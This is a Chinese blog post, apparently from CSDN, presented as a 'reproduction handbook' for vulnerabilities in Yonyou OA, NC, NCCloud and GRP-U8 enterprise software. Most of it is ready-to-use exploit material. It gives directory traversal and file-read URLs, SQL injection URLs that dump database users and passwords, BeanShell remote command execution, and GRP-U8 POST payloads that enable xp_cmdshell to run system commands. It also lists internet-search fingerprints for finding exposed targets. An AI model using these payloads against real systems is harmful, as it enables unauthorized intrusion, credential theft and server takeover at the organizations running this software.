用友OA漏洞复现手册

已于 2022-04-20 20:05:05 修改
阅读量1.5w 收藏 50
点赞数 9
分类专栏: 实战漏洞复现 文章标签: 用友OA漏洞
于 2022-04-20 18:39:51 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_41617034/article/details/124268004
版权

前言:用友OA产品漏洞复现笔记,供自己使用,不定期更新
声明:本人所有文章均为技术分享,请勿非法用于其他用途,否则后果自负。

漏洞列表:
用友 FE协作办公平台 templateOfTaohong_manager.jsp 目录遍历漏洞
用友 U8 OA getSessionList.jsp 敏感信息泄漏漏洞
用友 U8 OA test.jsp SQL注入漏洞
用友 NC NCFindWeb 任意文件读取漏洞
用友 NC bsh.servlet.BshServlet 远程命令执行漏洞
用友 NCCloud FS文件管理SQL注入
用友 GRP-U8 Proxy SQL注入 CNNVD-201610-923
用友 ERP-NC NCFindWeb 目录遍历漏洞

用友 FE协作办公平台 templateOfTaohong_manager.jsp 目录遍历漏洞

漏洞描述
用友 FE协作办公平台 templateOfTaohong_manager.jsp文件存在目录遍历漏洞,通过漏洞攻击者可以获取目录文件等信息,导致进一步攻击

漏洞影响
用友 FE协作办公平台

网络测绘

"FE协作"

漏洞复现
1、漏洞位置:登陆界面
2、POC

/system/mediafile/templateOfTaohong_manager.jsp?path=/../../../

注:../可以根据实际增减
在这里插入图片描述

用友 U8 OA getSessionList.jsp 敏感信息泄漏漏洞

漏洞描述
用友 U8 OA getSessionList.jsp文件,通过漏洞攻击者可以获取数据库中管理员的账户信息

漏洞影响
用友 U8 OA

网络测绘

"用友U8-OA"

漏洞复现
在这里插入图片描述

用友 U8 OA test.jsp SQL注入漏洞

漏洞描述
用友 U8 OA test.jsp文件存在 SQL注入漏洞,由于与致远OA使用相同的文件,于是存在了同样的漏洞

漏洞影响
用友 U8 OA

网络测绘

"用友U8-OA"

漏洞复现
简单POC:

/yyoa/common/js/menu/test.jsp?doType=101&S1=(SELECT%20MD5(1))

在这里插入图片描述
在这里插入图片描述
其他POC:

(1)查看当前数据库名
/yyoa/common/js/menu/test.jsp?doType=101&S1=(select%20database(),user())

(2)查看当前数据库中所有的表名
/yyoa/common/js/menu/test.jsp?doType=101&S1=(select%201,group_concat(table_name)from%20information_schema.tables%20where%20table_schema=database())

查看所有数据库中的表名
/yyoa/common/js/menu/test.jsp?doType=101&S1=(select%20table_name,table_schema%20from%20information_schema.tables)


(3)查看指定表中的字段名
/yyoa/common/js/menu/test.jsp?doType=101&S1=(select%201,group_concat(column_name)%20from%20information_schema.columns%20where%20table_name=%27user%27)

(4)查看指定数据库,表中字段的字段值
/yyoa/common/js/menu/test.jsp?doType=101&S1=(select%20group_concat(User,CHAR(32),Password)%20from%20mysql.user)

(1)查看当前数据库名和用户
在这里插入图片描述
(2)查看当前数据库中所有的表名
在这里插入图片描述

查看所有数据库中的表名
在这里插入图片描述
在这里插入图片描述

(3)查看指定表中的字段名
在这里插入图片描述
(4)查看指定数据库,表中字段的字段值

在这里插入图片描述

用友 NC NCFindWeb 任意文件读取漏洞

漏洞描述
用友NC存在任意文件读取漏洞,攻击者通过漏洞可读取服务器敏感文件

漏洞影响
用友NC

网络测绘

icon_hash="1085941792"

漏洞复现

1、首页
在这里插入图片描述

2、

POC:

/NCFindWeb?service=IPreAlertConfigService&filename
/NCFindWeb?service=IPreAlertConfigService&filename=WEB-INF/web.xml

在这里插入图片描述
在这里插入图片描述

用友 NC bsh.servlet.BshServlet 远程命令执行漏洞

漏洞描述
用友 NC bsh.servlet.BshServlet 存在远程命令执行漏洞,通过BeanShell 执行远程命令获取服务器权限

漏洞影响
用友 NC

网络测绘

icon_hash="1085941792"

漏洞复现
POC:

/servlet/~ic/bsh.servlet.BshServlet

代码执行命令:

print("hello!");
exec("whoami");

在这里插入图片描述
在这里插入图片描述

用友 NCCloud FS文件管理SQL注入

漏洞描述
用友 NCCloud FS文件管理登录页面对用户名参数没有过滤,存在SQL注入

漏洞影响
用友 NCCloud

网络测绘

"NCCloud"

漏洞复现
POC:

http://xx.xx.xx.xx/fs/

1、登陆界面
在这里插入图片描述
2、查看能否访问fs目录
在这里插入图片描述
3、输入账号密码,抓包注入

GET /fs/console?username=222&password=WiEZoxowjDhBk7bfE9nvzP3TjiK%2FRivMT1jKxrq42bI%3D HTTP/1.1
Host: xx.xx.xx.xx
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Referer: http://xx.xx.xx.xx/fs/
Cookie: txtime=3; txid=b739672ff4c68a5b8450A1649974747953A261714; txtime=0; txid=b739672ff4c68a5b8450A1649974747953A261384; JSESSIONID=E45320CE48B012BB5E916D65BEC18C7A.ncMem04
DNT: 1
Connection: close
Upgrade-Insecure-Requests: 1

用sqlmap对username参数进行注入

py -3 sqlmap.py -r 1.txt -p username --dbs --batch

在这里插入图片描述

用友 GRP-U8 Proxy SQL注入 CNNVD-201610-923

漏洞描述
用友GRP-u8存在XXE漏洞,该漏洞源于应用程序解析XML输入时没有进制外部实体的加载,导致可加载外部SQL语句,以及命令执行

影响版本
用友GRP-U8行政事业内控管理软件(新政府会计制度专版)

网络测绘

title="用友GRP-U8行政事业内控管理软件"

漏洞复现
1、POC

POST /Proxy HTTP/1.1
Host: xx.xx.xx.xx
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Cookie: JSESSIONID=E15264F5F83AFE80D7E9F7A9CF3250D2
DNT: 1
Connection: close
Upgrade-Insecure-Requests: 1
Content-Type: application/x-www-form-urlencoded
Content-Length: 348

cVer=9.8.0&dp=<?xml version="1.0" encoding="GB2312"?><R9PACKET version="1"><DATAFORMAT>XML</DATAFORMAT><R9FUNCTION> <NAME>AS_DataRequest</NAME><PARAMS><PARAM> <NAME>ProviderName</NAME><DATA format="text">DataSetProviderData</DATA></PARAM><PARAM> <NAME>Data</NAME><DATA format="text">select user,db_name(),host_name(),@@version</DATA></PARAM></PARAMS> </R9FUNCTION></R9PACKET>

F12查看SQL语句结果
在这里插入图片描述
2、命令执行
POST POC

cVer=9.8.0&dp=<?xml version="1.0" encoding="GB2312"?><R9PACKET version="1"><DATAFORMAT>XML</DATAFORMAT><R9FUNCTION><NAME>AS_DataRequest</NAME><PARAMS><PARAM><NAME>ProviderName</NAME><DATA format="text">DataSetProviderData</DATA></PARAM><PARAM><NAME>Data</NAME><DATA format="text">exec xp_cmdshell "whoami"</DATA></PARAM></PARAMS></R9FUNCTION></R9PACKET>

在这里插入图片描述
3、如果遇到如下所示无法执行,非100%成功解决方法
在这里插入图片描述
将如下POST数据按顺序发送
注:下面数据包中的master改为当前数据库名
执行过程中报错java.sql.SQLException【错误代码: 0; 相关信息: xxxx不用管,全部执行完成后再执行系统命令

cVer=9.8.0&dp=<?xml version="1.0" encoding="GB2312"?><R9PACKET version="1"><DATAFORMAT>XML</DATAFORMAT><R9FUNCTION><NAME>AS_DataRequest</NAME><PARAMS><PARAM><NAME>ProviderName</NAME><DATA format="text">DataSetProviderData</DATA></PARAM><PARAM><NAME>Data</NAME><DATA format="text">use master</DATA></PARAM></PARAMS></R9FUNCTION></R9PACKET>

cVer=9.8.0&dp=<?xml version="1.0" encoding="GB2312"?><R9PACKET version="1"><DATAFORMAT>XML</DATAFORMAT><R9FUNCTION><NAME>AS_DataRequest</NAME><PARAMS><PARAM><NAME>ProviderName</NAME><DATA format="text">DataSetProviderData</DATA></PARAM><PARAM><NAME>Data</NAME><DATA format="text">exec sp_configure 'show advanced options',1</DATA></PARAM></PARAMS></R9FUNCTION></R9PACKET>

cVer=9.8.0&dp=<?xml version="1.0" encoding="GB2312"?><R9PACKET version="1"><DATAFORMAT>XML</DATAFORMAT><R9FUNCTION><NAME>AS_DataRequest</NAME><PARAMS><PARAM><NAME>ProviderName</NAME><DATA format="text">DataSetProviderData</DATA></PARAM><PARAM><NAME>Data</NAME><DATA format="text">reconfigure</DATA></PARAM></PARAMS></R9FUNCTION></R9PACKET>

cVer=9.8.0&dp=<?xml version="1.0" encoding="GB2312"?><R9PACKET version="1"><DATAFORMAT>XML</DATAFORMAT><R9FUNCTION><NAME>AS_DataRequest</NAME><PARAMS><PARAM><NAME>ProviderName</NAME><DATA format="text">DataSetProviderData</DATA></PARAM><PARAM><NAME>Data</NAME><DATA format="text">exec sp_configure 'xp_cmdshell',1</DATA></PARAM></PARAMS></R9FUNCTION></R9PACKET>

cVer=9.8.0&dp=<?xml version="1.0" encoding="GB2312"?><R9PACKET version="1"><DATAFORMAT>XML</DATAFORMAT><R9FUNCTION><NAME>AS_DataRequest</NAME><PARAMS><PARAM><NAME>ProviderName</NAME><DATA format="text">DataSetProviderData</DATA></PARAM><PARAM><NAME>Data</NAME><DATA format="text">reconfigure</DATA></PARAM></PARAMS></R9FUNCTION></R9PACKET>

cVer=9.8.0&dp=<?xml version="1.0" encoding="GB2312"?><R9PACKET version="1"><DATAFORMAT>XML</DATAFORMAT><R9FUNCTION><NAME>AS_DataRequest</NAME><PARAMS><PARAM><NAME>ProviderName</NAME><DATA format="text">DataSetProviderData</DATA></PARAM><PARAM><NAME>Data</NAME><DATA format="text">exec xp_cmdshell "whoami"</DATA></PARAM></PARAMS></R9FUNCTION></R9PACKET>

用友 ERP-NC NCFindWeb 目录遍历漏洞

漏洞描述
用友ERP-NC 存在目录遍历漏洞,攻击者可以通过目录遍历获取敏感文件信息

漏洞影响
用友ERP-NC

网络测绘

app="用友-UFIDA-NC"

漏洞复现
POC

/NCFindWeb?service=IPreAlertConfigService&filename=

在这里插入图片描述
在这里插入图片描述

1stPeak
关注
  • 9
    点赞
  • 50
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 3
    评论
专栏目录
用友bshservlet_databasedecode漏洞
计算机毕业论文源码,学生个人网页制作html源码。贴近用户做网络推广和互联网优化。
12-01 932
用友bshservlet_databasedecode漏洞成因: 用友bshservlet_databasedecode漏洞bash.servlet.BshServlet远程命令执行,用友 NC bsh.servlet.BshServlet 存在远程命令执行漏洞,该漏洞为远程命令执行漏洞,在无需登陆系统的情况下,攻击者可通过BeanShell测试接口(BeanShell可以直接执行java代码,适用于测试java代码的接口)直接执行任意命令,恶意攻击者成功利用该漏洞可获得目标系统管理权限。 用友bshser
用友NC 漏洞汇总(转载)
xiaobai_20190815的博客
11-21 8989
用友NC 漏洞汇总
用友NC BeanShell远程命令执行(CNVD-2021-30167)漏洞复现
LfanBQX的博客
06-06 438
用友NC是一款企业级管理软件,在大中型企业广泛使用。实现建模、开发、继承、运行、管理一体化的IT解决方案信息化平台。用友 NC bsh.servlet.BshServlet目录存在远程命令执行漏洞,可通过BeanShell 执行远程命令获取服务器权限。3.网站访问/servlet/~ic/bsh.servlet.BshServlet目录,出现如下页面。2.FOFA上挑选一位存在CNVD-2021-30167漏洞的幸运儿,进行验证。(2)对BeanShell接口添加授权认证机制。貌似所有版本都存在。
【高危】用友 U8 Cloud、GRP-U8、A++V8.31存在多个高危漏洞
murphysec的博客
06-07 1708
墨菲安全是一家为您提供专业的软件供应链安全管理的科技公司,核心团队来自百度、华为、乌云等企业,公司为客户提供完整的软件供应链安全管理平台,围绕SBOM提供软件全生命周期的安全管理,平台能力包括软件成分分析、源安全管理、容器镜像检测、漏洞情报预警及商业软件供应链准入评估等多个产品。用友 GRP-U8 存在3个高危漏洞,分别为forgetPassword_old.jsp SQL注入漏洞、XML实体注入漏洞、XXNode SQL注入漏洞用友@[GRP-U8, GRP-U8]
用友GRP-U8 存在任意文件上传漏洞
holyxp的博客
07-26 1837
用友GRP-U8是面向政府及行政事业单位的财政管理应用。
用友OA U8 test.jsp sql注入漏洞复现
qq_44828901的博客
06-21 1600
简单验证、复现漏洞
用友OA/NC/NCCloud漏洞集合
qq_53229503的博客
08-16 8196
用友OA/NC/NCCloud漏洞集合
用友致远OA操作手册V276-1.docx
05-26
用友致远OA操作手册
协同办公(OA)系统操作手册
最新发布
06-29
协同办公(OA)系统操作手册
用友NC任意文件上传漏洞利用工具
04-14
用友NC任意文件上传漏洞利用工具,用友NC6.5的某个页面,存在任意文件上传漏洞漏洞成因在于上传文件处未作类型限制,未经身份验证的攻击者可通过向目标系统发送特制数据包来利用此漏洞,成功利用此漏洞的远程攻击...
用友NC的操作手册
02-13
用友公司的ERP各模块操作手册,包括生产模块,采购模块,质量模块,销售模块
用友ERP指导手册.docx
06-01
用友ERP指导手册
DIVA靶场测试APP客户端不规范项(一)_diva android 是什么应用
wdsfgj的博客
04-17 792
使用了SharedPreferences类,该类是Android平台上一个轻量级的存储类,主要是用来保存一些常用的配置,本例中是用该类存储了用户名和密码,因此是具有风险的。SharedPreferences类存储的数据会以.xml的形式存储在/data/data/apppackagename/shared_prefs目录下。一般app对应的数据库目录: /data/data/apppackagename/databases。使用adb查看临时文件,目录在/data/data/apppackagename/
【1day】用友GRP-U8 OA日志泄露漏洞学习
记录并分享学习安全的知识点..
09-29 262
用友GRP-U8 OA是一款企业级管理软件,主要面向中小型企业,提供全面的业务管理解决方案,包括财务、人力资源、采购、销售、仓库、生产等多个模块。用友GRP-U8 OA存在日志泄露漏洞,攻击者可以从系统或应用程序的日志中获取敏感信息的漏洞。这些敏感信息可能包括用户凭据、会话令牌、交易数据、个人身份信息等等。
用友NC存在命令执行漏洞(CNVD-2021-30167)复现
嘟的博客
07-07 6970
漏洞说明: 2021年5月27日,国家信息安全漏洞共享平台(CNVD)公布了用友NC存在命令执行漏洞(CNVD-2021-30167),用友NC采用J2EE架构,面向大型企业集团和成长中的集团企业的信息化需求,为集团企业提供建模、开发、集成、运行、管理一体化的信息化解决方案。 2021年6月2日,用友公司发布了关于用友NC BeanShell远程代码执行漏洞的风险通告。由于用友NC对外开放了BeanShell的测试接口,未经身份验证的攻击者利用该测试接口,通过向目标服务器发送恶意构造的Http请求,在..
用友NC BeanShell RCE漏洞
qq_44484541的博客
11-01 864
用友 NC 是面向集团企业的管理软件,其在同类市场占有率中达到亚太第一。用友 NC 由于对外开放了 BeanShell 接口,攻击者可以在未授权的情况下直接访问该接口,并构造恶意数据执行任意代码从而获取服务器权限。该漏洞为第三方 Jar 包漏洞导致,用友 NC 官方已发布安全补丁,建议使用该产品的用户及时安装该漏洞补丁包。3.这里有执行代码的接口,输入payload如:exec(“whoami”);2.访问路径/servlet/~ic/bsh.servlet.BshServlet。
用友GRP-U8 ReturnForWcp RCE漏洞复现
0xSec
11-16 1253
用友GRP-U8内控管理软件/servlet/PayReturnForWcp接口处存在xxe漏洞,攻击者可利用xxe漏洞组合内部axis组件的AdminService部署恶意类service,使用外部实体%name来加载"http://xxxx/services/AdminService?method=xx" 远程URL,调用javax.elELProcessor,部署成功后可写入恶意后门文件,可导致服务器失陷。
用友OA漏洞学习——test.jsp SQL注入漏洞
记录并分享学习安全的知识点..
05-02 3515
警告 请勿使用本文提到的内容违反法律。 本文不提供任何担保 目录 警告 一、概述 二、影响版本 三、漏洞复现 验证poc如下: 一、概述 用友 U8 OA test.jsp文件存在 SQL注入漏洞,由于与致远OA使用相同的文件,于是存在了同样的漏洞。 二、影响版本 用友 U8 OA产品,版本不详。 三、漏洞复现 验证poc如下: /yyoa/common/js/menu/test.jsp?doType=101&S1=(SELECT%2...
史上最全!用友NC 漏洞汇总
2301_80115097的博客
12-01 938
参数可以读取下列所有文件,在某些情况下可以读取利用目录穿越可读取/etc/passwd等文件。版本存在未授权文件上传漏洞,攻击者可以未授权上传任意文件,进而获取服务端控制权限。版本存在反序列化漏洞,攻击者可以执行系统命令,获取服务端权限。账户密码随便填,抓包将返回包0改为1,即可任意用户登录。在其中有个接口可以获取数据库账户密码,不过是老版本了。文件管理登录页面对用户名参数没有过滤,存在。ncDecode---用友nc数据库密码解密。存在远程命令执行漏洞,通过。用友NC-OA漏洞合集。
用友OA漏洞liqun
07-28
很抱歉,我无法理解你的问题。你可以提供更多的信息或者重新提问吗? #### 引用[.reference_title] ..."1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute....
评论 3
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

1stPeak

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值